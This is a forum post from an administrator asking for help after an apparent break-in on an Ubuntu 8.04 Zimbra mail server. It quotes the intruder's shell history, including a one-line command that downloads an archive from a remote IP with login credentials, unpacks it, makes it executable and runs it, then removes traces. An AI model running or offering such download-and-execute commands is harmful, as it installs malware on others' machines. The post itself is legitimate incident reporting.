Hi - a zimbra box I keep an eye on was compromised on 12/7 - I noticed I stopped receiving automated emails from the backup script.

This was in the .bash_history

id
uname -a
ls -a
cat .bash_history
cd /tmp
ls -a
wget eff-tee-pee://user:123456@65.38.182.79/autorun.tgz;tar[/url] -xzvf autorun.tgz;rm -rf autorun.tgz;cd .m;cd conect3;chmod +x *;./start lfg
cd ..
ls -a
cd ..
rm -rf .m
ps x
kill -9 12150
exit

So the zmback cron was removed. It's an ubuntu 8.04 server, kept up to date with apt. Apart from zimbra, the only other thing installed is Webmin which is locked down to being only available to 2 IP addresses. The router only has open ports for the essential zimbra services (secure imap, ssl smpt etc).

Any advice please? My desktop AVG reports the file as being infected with Linux/Mech.A -

I've altered the URL shown to as to stop people clicking on it.

sem